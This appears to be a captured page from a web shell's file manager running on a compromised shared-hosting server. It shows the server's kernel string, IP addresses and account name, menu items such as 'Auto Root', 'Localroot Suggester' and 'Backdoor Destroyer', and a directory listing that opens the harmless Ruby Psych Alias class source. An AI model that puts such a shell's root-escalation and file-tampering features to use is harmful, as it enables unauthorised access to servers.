Linux premium71.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 3.23.61.129
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby22 /
lib64 /
ruby /
2.2.0 /
psych /
nodes /
Delete
Unzip
Name
Size
Permission
Date
Action
alias.rb
464
B
-rw-r--r--
2023-07-26 14:31
document.rb
1.75
KB
-rw-r--r--
2023-07-26 14:31
mapping.rb
1.48
KB
-rw-r--r--
2023-07-26 14:31
node.rb
1.23
KB
-rw-r--r--
2023-07-26 14:31
scalar.rb
1.57
KB
-rw-r--r--
2023-07-26 14:31
sequence.rb
1.97
KB
-rw-r--r--
2023-07-26 14:31
stream.rb
965
B
-rw-r--r--
2023-07-26 14:31
Save
Rename
module Psych module Nodes ### # This class represents a {YAML Alias}[http://yaml.org/spec/1.1/#alias]. # It points to an +anchor+. # # A Psych::Nodes::Alias is a terminal node and may have no children. class Alias < Psych::Nodes::Node # The anchor this alias links to attr_accessor :anchor # Create a new Alias that points to an +anchor+ def initialize anchor @anchor = anchor end end end end